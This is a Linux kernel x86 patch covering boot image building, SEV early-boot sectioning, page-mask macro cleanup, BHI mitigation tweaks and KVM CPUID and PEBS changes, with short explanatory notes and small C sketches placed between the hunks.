++	unsigned int i, sz, setup_sectors;
+ 	int c;
+-	u32 sys_size;
+ 	struct stat sb;
+ 	FILE *file, *dest;
+ 	int fd;
+ 	void *kernel;
+ 	u32 crc = 0xffffffffUL;
+ 
+-	efi_stub_defaults();
+-
+ 	if (argc != 5)
+ 		usage();
+ 	parse_zoffset(argv[3]);
+@@ -403,72 +200,27 @@ int main(int argc, char ** argv)
+ 		die("Boot block hasn't got boot flag (0xAA55)");
+ 	fclose(file);
+ 
+-	c += reserve_pecoff_compat_section(c);
+-	c += reserve_pecoff_reloc_section(c);
+-
+ 	/* Pad unused space with zeros */
+-	setup_sectors = (c + 511) / 512;
++	setup_sectors = (c + 4095) / 4096;
++	setup_sectors *= 8;
+ 	if (setup_sectors < SETUP_SECT_MIN)
+ 		setup_sectors = SETUP_SECT_MIN;
+ 	i = setup_sectors*512;
+ 	memset(buf+c, 0, i-c);
+ 
+-	update_pecoff_setup_and_reloc(i);
+-
+-	/* Set the default root device */
+-	put_unaligned_le16(DEFAULT_ROOT_DEV, &buf[508]);
+-
+ 	/* Open and stat the kernel file */
+ 	fd = open(argv[2], O_RDONLY);
+ 	if (fd < 0)
+ 		die("Unable to open `%s': %m", argv[2]);
+ 	if (fstat(fd, &sb))
+ 		die("Unable to stat `%s': %m", argv[2]);
+-	sz = sb.st_size;
++	if (_edata != sb.st_size)
++		die("Unexpected file size `%s': %u != %u", argv[2], _edata,
++		    sb.st_size);
++	sz = _edata - 4;
+ 	kernel = mmap(NULL, sz, PROT_READ, MAP_SHARED, fd, 0);
+ 	if (kernel == MAP_FAILED)
+ 		die("Unable to mmap '%s': %m", argv[2]);
+-	/* Number of 16-byte paragraphs, including space for a 4-byte CRC */
+-	sys_size = (sz + 15 + 4) / 16;
+-#ifdef CONFIG_EFI_STUB
+-	/*
+-	 * COFF requires minimum 32-byte alignment of sections, and
+-	 * adding a signature is problematic without that alignment.
+-	 */
+-	sys_size = (sys_size + 1) & ~1;
+-#endif
+-
+-	/* Patch the setup code with the appropriate size parameters */
+-	buf[0x1f1] = setup_sectors-1;
+-	put_unaligned_le32(sys_size, &buf[0x1f4]);
+-
+-	init_sz = get_unaligned_le32(&buf[0x260]);
+-#ifdef CONFIG_EFI_STUB
+-	/*
+-	 * The decompression buffer will start at ImageBase. When relocating
+-	 * the compressed kernel to its end, we must ensure that the head
+-	 * section does not get overwritten.  The head section occupies
+-	 * [i, i + _ehead), and the destination is [init_sz - _end, init_sz).
+-	 *
+-	 * At present these should never overlap, because 'i' is at most 32k
+-	 * because of SETUP_SECT_MAX, '_ehead' is less than 1k, and the
+-	 * calculation of INIT_SIZE in boot/header.S ensures that
+-	 * 'init_sz - _end' is at least 64k.
+-	 *
+-	 * For future-proofing, increase init_sz if necessary.
+-	 */
+-
+-	if (init_sz - _end < i + _ehead) {
+-		init_sz = (i + _ehead + _end + 4095) & ~4095;
+-		put_unaligned_le32(init_sz, &buf[0x260]);
+-	}
+-#endif
+-	update_pecoff_text(setup_sectors * 512, i + (sys_size * 16), init_sz);
+-
+-	efi_stub_entry_update();
+-
+-	/* Update kernel_info offset. */
+-	put_unaligned_le32(kernel_info, &buf[0x268]);
+ 
+ 	crc = partial_crc32(buf, i, crc);
+ 	if (fwrite(buf, 1, i, dest) != i)
+@@ -479,13 +231,6 @@ int main(int argc, char ** argv)
+ 	if (fwrite(kernel, 1, sz, dest) != sz)
+ 		die("Writing kernel failed");
+ 
+-	/* Add padding leaving 4 bytes for the checksum */
+-	while (sz++ < (sys_size*16) - 4) {
+-		crc = partial_crc32_one('\0', crc);
+-		if (fwrite("\0", 1, 1, dest) != 1)
+-			die("Writing padding failed");
+-	}
+-
+ 	/* Write the CRC */
+ 	put_unaligned_le32(crc, buf);
+ 	if (fwrite(buf, 1, 4, dest) != 4)
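build.c is reduced to concatenating setup and kernel and appending the running
CRC-32; note it stores the raw register value, without the usual final
inversion. A self-contained sketch of that checksum, assuming the same
reflected polynomial as partial_crc32():

#include <stdio.h>

static unsigned int partial_crc32(const unsigned char *p, int len,
                                  unsigned int crc)
{
        while (len--) {
                int i;

                crc ^= *p++;
                for (i = 0; i < 8; i++)
                        crc = (crc >> 1) ^ ((crc & 1) ? 0xedb88320u : 0);
        }
        return crc;
}

int main(void)
{
        unsigned char buf[] = "setup then kernel bytes";
        unsigned int crc = partial_crc32(buf, sizeof(buf) - 1, 0xffffffffu);

        printf("crc = 0x%08x\n", crc);  /* written as the last 4 bytes */
        return 0;
}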
+diff --git a/arch/x86/include/asm/boot.h b/arch/x86/include/asm/boot.h
+index a38cc0afc90a0..a3e0be0470a40 100644
+--- a/arch/x86/include/asm/boot.h
++++ b/arch/x86/include/asm/boot.h
+@@ -81,6 +81,7 @@
+ 
+ #ifndef __ASSEMBLY__
+ extern unsigned int output_len;
++extern const unsigned long kernel_text_size;
+ extern const unsigned long kernel_total_size;
+ 
+ unsigned long decompress_kernel(unsigned char *outbuf, unsigned long virt_addr,
+diff --git a/arch/x86/include/asm/init.h b/arch/x86/include/asm/init.h
+index 5f1d3c421f686..cc9ccf61b6bd1 100644
+--- a/arch/x86/include/asm/init.h
++++ b/arch/x86/include/asm/init.h
+@@ -2,6 +2,8 @@
+ #ifndef _ASM_X86_INIT_H
+ #define _ASM_X86_INIT_H
+ 
++#define __head	__section(".head.text")
++
+ struct x86_mapping_info {
+ 	void *(*alloc_pgt_page)(void *); /* allocate buf for page table */
+ 	void *context;			 /* context for alloc_pgt_page */
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index dfcdcafe3a2cd..887a171488ea2 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -773,6 +773,7 @@ struct kvm_vcpu_arch {
+ 	int cpuid_nent;
+ 	struct kvm_cpuid_entry2 *cpuid_entries;
+ 	u32 kvm_cpuid_base;
++	bool is_amd_compatible;
+ 
+ 	u64 reserved_gpa_bits;
+ 	int maxphyaddr;
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index 41d06822bc8cd..853f423b1d138 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -46,8 +46,8 @@ void __init sme_unmap_bootdata(char *real_mode_data);
+ void __init sme_early_init(void);
+ void __init sev_setup_arch(void);
+ 
+-void __init sme_encrypt_kernel(struct boot_params *bp);
+-void __init sme_enable(struct boot_params *bp);
++void sme_encrypt_kernel(struct boot_params *bp);
++void sme_enable(struct boot_params *bp);
+ 
+ int __init early_set_memory_decrypted(unsigned long vaddr, unsigned long size);
+ int __init early_set_memory_encrypted(unsigned long vaddr, unsigned long size);
+@@ -80,8 +80,8 @@ static inline void __init sme_unmap_bootdata(char *real_mode_data) { }
+ static inline void __init sme_early_init(void) { }
+ static inline void __init sev_setup_arch(void) { }
+ 
+-static inline void __init sme_encrypt_kernel(struct boot_params *bp) { }
+-static inline void __init sme_enable(struct boot_params *bp) { }
++static inline void sme_encrypt_kernel(struct boot_params *bp) { }
++static inline void sme_enable(struct boot_params *bp) { }
+ 
+ static inline void sev_es_init_vc_handling(void) { }
+ 
+diff --git a/arch/x86/include/asm/page_types.h b/arch/x86/include/asm/page_types.h
+index a506a411474d4..86bd4311daf8a 100644
+--- a/arch/x86/include/asm/page_types.h
++++ b/arch/x86/include/asm/page_types.h
+@@ -11,20 +11,14 @@
+ #define PAGE_SIZE		(_AC(1,UL) << PAGE_SHIFT)
+ #define PAGE_MASK		(~(PAGE_SIZE-1))
+ 
+-#define PMD_PAGE_SIZE		(_AC(1, UL) << PMD_SHIFT)
+-#define PMD_PAGE_MASK		(~(PMD_PAGE_SIZE-1))
+-
+-#define PUD_PAGE_SIZE		(_AC(1, UL) << PUD_SHIFT)
+-#define PUD_PAGE_MASK		(~(PUD_PAGE_SIZE-1))
+-
+ #define __VIRTUAL_MASK		((1UL << __VIRTUAL_MASK_SHIFT) - 1)
+ 
+-/* Cast *PAGE_MASK to a signed type so that it is sign-extended if
++/* Cast P*D_MASK to a signed type so that it is sign-extended if
+    virtual addresses are 32-bits but physical addresses are larger
+    (ie, 32-bit PAE). */
+ #define PHYSICAL_PAGE_MASK	(((signed long)PAGE_MASK) & __PHYSICAL_MASK)
+-#define PHYSICAL_PMD_PAGE_MASK	(((signed long)PMD_PAGE_MASK) & __PHYSICAL_MASK)
+-#define PHYSICAL_PUD_PAGE_MASK	(((signed long)PUD_PAGE_MASK) & __PHYSICAL_MASK)
++#define PHYSICAL_PMD_PAGE_MASK	(((signed long)PMD_MASK) & __PHYSICAL_MASK)
++#define PHYSICAL_PUD_PAGE_MASK	(((signed long)PUD_MASK) & __PHYSICAL_MASK)
+ 
+ #define HPAGE_SHIFT		PMD_SHIFT
+ #define HPAGE_SIZE		(_AC(1,UL) << HPAGE_SHIFT)
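The rename is possible because PMD_PAGE_SIZE/PMD_PAGE_MASK duplicated the
generic PMD_SIZE/PMD_MASK exactly. A sketch of the 2M masking they provide,
assuming the usual x86-64 PMD_SHIFT of 21:

#include <stdio.h>

#define PMD_SHIFT       21
#define PMD_SIZE        (1UL << PMD_SHIFT)
#define PMD_MASK        (~(PMD_SIZE - 1))

int main(void)
{
        unsigned long va = 0x7f1234567abcUL;

        printf("2M base:   0x%lx\n", va & PMD_MASK);
        printf("2M offset: 0x%lx\n", va & ~PMD_MASK);
        return 0;
}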
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index c57dd21155bd7..bcac2e53d50bb 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -192,15 +192,15 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ struct snp_guest_request_ioctl;
+ 
+ void setup_ghcb(void);
+-void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+-					 unsigned long npages);
+-void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+-					unsigned long npages);
++void early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
++				  unsigned long npages);
++void early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
++				 unsigned long npages);
+ void snp_set_memory_shared(unsigned long vaddr, unsigned long npages);
+ void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+-void __init __noreturn snp_abort(void);
++void __noreturn snp_abort(void);
+ void snp_dmi_setup(void);
+ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
+ u64 snp_get_unsupported_features(u64 status);
+diff --git a/arch/x86/kernel/amd_gart_64.c b/arch/x86/kernel/amd_gart_64.c
+index 19a0207e529fe..56a917df410d3 100644
+--- a/arch/x86/kernel/amd_gart_64.c
++++ b/arch/x86/kernel/amd_gart_64.c
+@@ -504,7 +504,7 @@ static __init unsigned long check_iommu_size(unsigned long aper, u64 aper_size)
+ 	}
+ 
+ 	a = aper + iommu_size;
+-	iommu_size -= round_up(a, PMD_PAGE_SIZE) - a;
++	iommu_size -= round_up(a, PMD_SIZE) - a;
+ 
+ 	if (iommu_size < 64*1024*1024) {
+ 		pr_warn("PCI-DMA: Warning: Small IOMMU %luMB."
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 6d69123de3660..3f38592ec7713 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1629,7 +1629,8 @@ static void __init bhi_select_mitigation(void)
+ 		return;
+ 
+ 	/* Retpoline mitigates against BHI unless the CPU has RRSBA behavior */
+-	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE)) {
++	if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
++	    !boot_cpu_has(X86_FEATURE_RETPOLINE_LFENCE)) {
+ 		spec_ctrl_disable_kernel_rrsba();
+ 		if (rrsba_disabled)
+ 			return;
+@@ -2783,11 +2784,13 @@ static const char *spectre_bhi_state(void)
+ {
+ 	if (!boot_cpu_has_bug(X86_BUG_BHI))
+ 		return "; BHI: Not affected";
+-	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_HW))
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_HW))
+ 		return "; BHI: BHI_DIS_S";
+-	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
+ 		return "; BHI: SW loop, KVM: SW loop";
+-	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) && rrsba_disabled)
++	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
++		 !boot_cpu_has(X86_FEATURE_RETPOLINE_LFENCE) &&
++		 rrsba_disabled)
+ 		return "; BHI: Retpoline";
+ 	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
+ 		return "; BHI: Vulnerable, KVM: SW loop";
+diff --git a/arch/x86/kernel/cpu/cpuid-deps.c b/arch/x86/kernel/cpu/cpuid-deps.c
+index c881bcafba7d7..9c19f40b1b272 100644
+--- a/arch/x86/kernel/cpu/cpuid-deps.c
++++ b/arch/x86/kernel/cpu/cpuid-deps.c
+@@ -44,7 +44,10 @@ static const struct cpuid_dep cpuid_deps[] = {
+ 	{ X86_FEATURE_F16C,			X86_FEATURE_XMM2,     },
+ 	{ X86_FEATURE_AES,			X86_FEATURE_XMM2      },
+ 	{ X86_FEATURE_SHA_NI,			X86_FEATURE_XMM2      },
++	{ X86_FEATURE_GFNI,			X86_FEATURE_XMM2      },
+ 	{ X86_FEATURE_FMA,			X86_FEATURE_AVX       },
++	{ X86_FEATURE_VAES,			X86_FEATURE_AVX       },
++	{ X86_FEATURE_VPCLMULQDQ,		X86_FEATURE_AVX       },
+ 	{ X86_FEATURE_AVX2,			X86_FEATURE_AVX,      },
+ 	{ X86_FEATURE_AVX512F,			X86_FEATURE_AVX,      },
+ 	{ X86_FEATURE_AVX512IFMA,		X86_FEATURE_AVX512F   },
+@@ -56,9 +59,6 @@ static const struct cpuid_dep cpuid_deps[] = {
+ 	{ X86_FEATURE_AVX512VL,			X86_FEATURE_AVX512F   },
+ 	{ X86_FEATURE_AVX512VBMI,		X86_FEATURE_AVX512F   },
+ 	{ X86_FEATURE_AVX512_VBMI2,		X86_FEATURE_AVX512VL  },
+-	{ X86_FEATURE_GFNI,			X86_FEATURE_AVX512VL  },
+-	{ X86_FEATURE_VAES,			X86_FEATURE_AVX512VL  },
+-	{ X86_FEATURE_VPCLMULQDQ,		X86_FEATURE_AVX512VL  },
+ 	{ X86_FEATURE_AVX512_VNNI,		X86_FEATURE_AVX512VL  },
+ 	{ X86_FEATURE_AVX512_BITALG,		X86_FEATURE_AVX512VL  },
+ 	{ X86_FEATURE_AVX512_4VNNIW,		X86_FEATURE_AVX512F   },
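Each cpuid_deps[] entry above reads "feature requires dependency", so clearing
a base feature must transitively clear everything built on it (GFNI is now
keyed to XMM2, and VAES/VPCLMULQDQ to AVX rather than AVX512VL). A toy model
of that transitive clearing, with invented feature bits:

#include <stdio.h>

enum { F_XMM2, F_AVX, F_GFNI, F_VAES, F_VPCLMULQDQ, F_MAX };

static const struct { int feature, depends; } deps[] = {
        { F_GFNI,       F_XMM2 },
        { F_VAES,       F_AVX },
        { F_VPCLMULQDQ, F_AVX },
};

static void clear_feature(unsigned int *mask, int f)
{
        unsigned int i;

        if (!(*mask & (1u << f)))
                return;
        *mask &= ~(1u << f);
        for (i = 0; i < sizeof(deps) / sizeof(deps[0]); i++)
                if (deps[i].depends == f)
                        clear_feature(mask, deps[i].feature);
}

int main(void)
{
        unsigned int mask = (1u << F_MAX) - 1;

        clear_feature(&mask, F_AVX);    /* also drops VAES, VPCLMULQDQ */
        printf("mask = 0x%x\n", mask);  /* 0x5: XMM2 and GFNI remain */
        return 0;
}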
+diff --git a/arch/x86/kernel/head64.c b/arch/x86/kernel/head64.c
+index 84adf12a76d3c..4fae511b2e2b2 100644
+--- a/arch/x86/kernel/head64.c
++++ b/arch/x86/kernel/head64.c
+@@ -41,6 +41,7 @@
+ #include <asm/trapnr.h>
+ #include <asm/sev.h>
+ #include <asm/tdx.h>
++#include <asm/init.h>
+ 
+ /*
+  * Manage page tables very early on.
+@@ -84,8 +85,6 @@ static struct desc_ptr startup_gdt_descr = {
+ 	.address = 0,
+ };
+ 
+-#define __head	__section(".head.text")
+-
+ static void __head *fixup_pointer(void *ptr, unsigned long physaddr)
+ {
+ 	return ptr - (void *)_text + (void *)physaddr;
+@@ -203,7 +202,7 @@ unsigned long __head __startup_64(unsigned long physaddr,
+ 	load_delta = physaddr - (unsigned long)(_text - __START_KERNEL_map);
+ 
+ 	/* Is the address not 2M aligned? */
+-	if (load_delta & ~PMD_PAGE_MASK)
++	if (load_delta & ~PMD_MASK)
+ 		for (;;);
+ 
+ 	/* Include the SME encryption mask in the fixup value */
+@@ -588,7 +587,7 @@ static void set_bringup_idt_handler(gate_desc *idt, int n, void *handler)
+ }
+ 
+ /* This runs while still in the direct mapping */
+-static void startup_64_load_idt(unsigned long physbase)
++static void __head startup_64_load_idt(unsigned long physbase)
+ {
+ 	struct desc_ptr *desc = fixup_pointer(&bringup_idt_descr, physbase);
+ 	gate_desc *idt = fixup_pointer(bringup_idt_table, physbase);
+diff --git a/arch/x86/kernel/platform-quirks.c b/arch/x86/kernel/platform-quirks.c
+index b348a672f71d5..b525fe6d66571 100644
+--- a/arch/x86/kernel/platform-quirks.c
++++ b/arch/x86/kernel/platform-quirks.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/kernel.h>
+ #include <linux/init.h>
++#include <linux/pnp.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/bios_ebda.h>
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 271e70d5748ef..3fe76bf17d95e 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -86,7 +86,8 @@ static bool __init sev_es_check_cpu_features(void)
+ 	return true;
+ }
+ 
+-static void __noreturn sev_es_terminate(unsigned int set, unsigned int reason)
++static void __head __noreturn
++sev_es_terminate(unsigned int set, unsigned int reason)
+ {
+ 	u64 val = GHCB_MSR_TERM_REQ;
+ 
+@@ -323,13 +324,7 @@ static int sev_cpuid_hv(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid
+  */
+ static const struct snp_cpuid_table *snp_cpuid_get_table(void)
+ {
+-	void *ptr;
+-
+-	asm ("lea cpuid_table_copy(%%rip), %0"
+-	     : "=r" (ptr)
+-	     : "p" (&cpuid_table_copy));
+-
+-	return ptr;
++	return &RIP_REL_REF(cpuid_table_copy);
+ }
+ 
+ /*
+@@ -388,7 +383,7 @@ static u32 snp_cpuid_calc_xsave_size(u64 xfeatures_en, bool compacted)
+ 	return xsave_size;
+ }
+ 
+-static bool
++static bool __head
+ snp_cpuid_get_validated_func(struct cpuid_leaf *leaf)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+@@ -525,7 +520,8 @@ static int snp_cpuid_postprocess(struct ghcb *ghcb, struct es_em_ctxt *ctxt,
+  * Returns -EOPNOTSUPP if feature not enabled. Any other non-zero return value
+  * should be treated as fatal by caller.
+  */
+-static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
++static int __head
++snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+ 
+@@ -567,7 +563,7 @@ static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_le
+  * page yet, so it only supports the MSR based communication with the
+  * hypervisor and only the CPUID exit-code.
+  */
+-void __init do_vc_no_ghcb(struct pt_regs *regs, unsigned long exit_code)
++void __head do_vc_no_ghcb(struct pt_regs *regs, unsigned long exit_code)
+ {
+ 	unsigned int subfn = lower_bits(regs->cx, 32);
+ 	unsigned int fn = lower_bits(regs->ax, 32);
+@@ -1013,7 +1009,8 @@ struct cc_setup_data {
+  * Search for a Confidential Computing blob passed in as a setup_data entry
+  * via the Linux Boot Protocol.
+  */
+-static struct cc_blob_sev_info *find_cc_blob_setup_data(struct boot_params *bp)
++static __head
++struct cc_blob_sev_info *find_cc_blob_setup_data(struct boot_params *bp)
+ {
+ 	struct cc_setup_data *sd = NULL;
+ 	struct setup_data *hdr;
+@@ -1040,7 +1037,7 @@ static struct cc_blob_sev_info *find_cc_blob_setup_data(struct boot_params *bp)
+  * mapping needs to be updated in sync with all the changes to virtual memory
+  * layout and related mapping facilities throughout the boot process.
+  */
+-static void __init setup_cpuid_table(const struct cc_blob_sev_info *cc_info)
++static void __head setup_cpuid_table(const struct cc_blob_sev_info *cc_info)
+ {
+ 	const struct snp_cpuid_table *cpuid_table_fw, *cpuid_table;
+ 	int i;
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index e35fcc8d4bae4..f8a8249ae1177 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -26,6 +26,7 @@
+ #include <linux/dmi.h>
+ #include <uapi/linux/sev-guest.h>
+ 
++#include <asm/init.h>
+ #include <asm/cpu_entry_area.h>
+ #include <asm/stacktrace.h>
+ #include <asm/sev.h>
+@@ -690,7 +691,7 @@ static void pvalidate_pages(unsigned long vaddr, unsigned long npages, bool vali
+ 	}
+ }
+ 
+-static void __init early_set_pages_state(unsigned long paddr, unsigned long npages, enum psc_op op)
++static void __head early_set_pages_state(unsigned long paddr, unsigned long npages, enum psc_op op)
+ {
+ 	unsigned long paddr_end;
+ 	u64 val;
+@@ -728,7 +729,7 @@ static void __init early_set_pages_state(unsigned long paddr, unsigned long npag
+ 	sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_PSC);
+ }
+ 
+-void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
++void __head early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+ 					 unsigned long npages)
+ {
+ 	/*
+@@ -2085,7 +2086,7 @@ bool __init handle_vc_boot_ghcb(struct pt_regs *regs)
+  *
+  * Scan for the blob in that order.
+  */
+-static __init struct cc_blob_sev_info *find_cc_blob(struct boot_params *bp)
++static __head struct cc_blob_sev_info *find_cc_blob(struct boot_params *bp)
+ {
+ 	struct cc_blob_sev_info *cc_info;
+ 
+@@ -2111,7 +2112,7 @@ static __init struct cc_blob_sev_info *find_cc_blob(struct boot_params *bp)
+ 	return cc_info;
+ }
+ 
+-bool __init snp_init(struct boot_params *bp)
++bool __head snp_init(struct boot_params *bp)
+ {
+ 	struct cc_blob_sev_info *cc_info;
+ 
+@@ -2133,7 +2134,7 @@ bool __init snp_init(struct boot_params *bp)
+ 	return true;
+ }
+ 
+-void __init __noreturn snp_abort(void)
++void __head __noreturn snp_abort(void)
+ {
+ 	sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
+ }
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index 62a44455c51d0..f02961cbbb75a 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -340,6 +340,7 @@ static void kvm_vcpu_after_set_cpuid(struct kvm_vcpu *vcpu)
+ 
+ 	kvm_update_pv_runtime(vcpu);
+ 
++	vcpu->arch.is_amd_compatible = guest_cpuid_is_amd_or_hygon(vcpu);
+ 	vcpu->arch.maxphyaddr = cpuid_query_maxphyaddr(vcpu);
+ 	vcpu->arch.reserved_gpa_bits = kvm_vcpu_reserved_gpa_bits_raw(vcpu);
+ 
+diff --git a/arch/x86/kvm/cpuid.h b/arch/x86/kvm/cpuid.h
+index b1658c0de847c..18fd2e845989a 100644
+--- a/arch/x86/kvm/cpuid.h
++++ b/arch/x86/kvm/cpuid.h
+@@ -125,6 +125,16 @@ static inline bool guest_cpuid_is_intel(struct kvm_vcpu *vcpu)
+ 	return best && is_guest_vendor_intel(best->ebx, best->ecx, best->edx);
+ }
+ 
++static inline bool guest_cpuid_is_amd_compatible(struct kvm_vcpu *vcpu)
++{
++	return vcpu->arch.is_amd_compatible;
++}
++
++static inline bool guest_cpuid_is_intel_compatible(struct kvm_vcpu *vcpu)
++{
++	return !guest_cpuid_is_amd_compatible(vcpu);
++}
++
+ static inline int guest_cpuid_family(struct kvm_vcpu *vcpu)
+ {
+ 	struct kvm_cpuid_entry2 *best;
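The new is_amd_compatible field is filled in once, in
kvm_vcpu_after_set_cpuid(), so hot paths read a cached boolean instead of
re-walking the guest CPUID entries. A toy user-space model of that caching
(vendor strings only; the real guest_cpuid_is_amd_or_hygon() inspects CPUID
leaf 0):

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

struct vcpu {
        char vendor[16];
        bool is_amd_compatible;
};

static void set_cpuid(struct vcpu *v, const char *vendor)
{
        snprintf(v->vendor, sizeof(v->vendor), "%s", vendor);
        /* compute once, at CPUID-set time */
        v->is_amd_compatible = !strcmp(vendor, "AuthenticAMD") ||
                               !strcmp(vendor, "HygonGenuine");
}

int main(void)
{
        struct vcpu v;

        set_cpuid(&v, "AuthenticAMD");
        printf("amd=%d intel=%d\n", v.is_amd_compatible,
               !v.is_amd_compatible);
        return 0;
}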
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index bfeafe4855528..c90fef0258c51 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2548,7 +2548,8 @@ int kvm_apic_local_deliver(struct kvm_lapic *apic, int lvt_type)
+ 		trig_mode = reg & APIC_LVT_LEVEL_TRIGGER;
+ 
+ 		r = __apic_accept_irq(apic, mode, vector, 1, trig_mode, NULL);
+-		if (r && lvt_type == APIC_LVTPC)
++		if (r && lvt_type == APIC_LVTPC &&
++		    guest_cpuid_is_intel_compatible(apic->vcpu))
+ 			kvm_lapic_set_reg(apic, APIC_LVTPC, reg | APIC_LVT_MASKED);
+ 		return r;
+ 	}
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index d30325e297a03..13134954e24df 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -4649,7 +4649,7 @@ static void reset_guest_rsvds_bits_mask(struct kvm_vcpu *vcpu,
+ 				context->cpu_role.base.level, is_efer_nx(context),
+ 				guest_can_use_gbpages(vcpu),
+ 				is_cr4_pse(context),
+-				guest_cpuid_is_amd_or_hygon(vcpu));
++				guest_cpuid_is_amd_compatible(vcpu));
+ }
+ 
+ static void
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 5c1590855ffcd..10aff2c9a4e4c 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -7742,8 +7742,28 @@ static u64 vmx_get_perf_capabilities(void)
+ 
+ 	if (vmx_pebs_supported()) {
+ 		perf_cap |= host_perf_cap & PERF_CAP_PEBS_MASK;
+-		if ((perf_cap & PERF_CAP_PEBS_FORMAT) < 4)
+-			perf_cap &= ~PERF_CAP_PEBS_BASELINE;
++
++		/*
++		 * Disallow adaptive PEBS as it is functionally broken, can be
++		 * used by the guest to read *host* LBRs, and can be used to
++		 * bypass userspace event filters.  To correctly and safely
++		 * support adaptive PEBS, KVM needs to:
++		 *
++		 * 1. Account for the ADAPTIVE flag when (re)programming fixed
++		 *    counters.
++		 *
++		 * 2. Gain support from perf (or take direct control of counter
++		 *    programming) to support events without adaptive PEBS
++		 *    enabled for the hardware counter.
++		 *
++		 * 3. Ensure LBR MSRs cannot hold host data on VM-Entry with
++		 *    adaptive PEBS enabled and MSR_PEBS_DATA_CFG.LBRS=1.
++		 *
++		 * 4. Document which PMU events are effectively exposed to the
++		 *    guest via adaptive PEBS, and make adaptive PEBS mutually
++		 *    exclusive with KVM_SET_PMU_EVENT_FILTER if necessary.
++		 */
++		perf_cap &= ~PERF_CAP_PEBS_BASELINE;
+ 	}
+ 
+ 	return perf_cap;
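The net effect of the hunk above is that PERF_CAP_PEBS_BASELINE is now masked
out of what KVM advertises unconditionally, regardless of the PEBS format
version. A sketch of that masking; the bit position and the host value are
illustrative, not taken from msr-index.h:

#include <stdio.h>

#define PERF_CAP_PEBS_BASELINE  (1ULL << 14)    /* illustrative bit */

int main(void)
{
        unsigned long long host_cap = 0x40f5;   /* illustrative host MSR */
        unsigned long long guest_cap = host_cap & ~PERF_CAP_PEBS_BASELINE;

        printf("guest perf_cap = 0x%llx\n", guest_cap);  /* 0xf5 */
        return 0;
}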
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index f724765032bc4..a2ea636a23086 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -3278,7 +3278,7 @@ static bool is_mci_status_msr(u32 msr)
+ static bool can_set_mci_status(struct kvm_vcpu *vcpu)
+ {
+ 	/* McStatusWrEn enabled? */
+-	if (guest_cpuid_is_amd_or_hygon(vcpu))
++	if (guest_cpuid_is_amd_compatible(vcpu))
+ 		return !!(vcpu->arch.msr_hwcr & BIT_ULL(18));
+ 
+ 	return false;
+diff --git a/arch/x86/mm/mem_encrypt_boot.S b/arch/x86/mm/mem_encrypt_boot.S
+index 9de3d900bc927..e25288ee33c2d 100644
+--- a/arch/x86/mm/mem_encrypt_boot.S
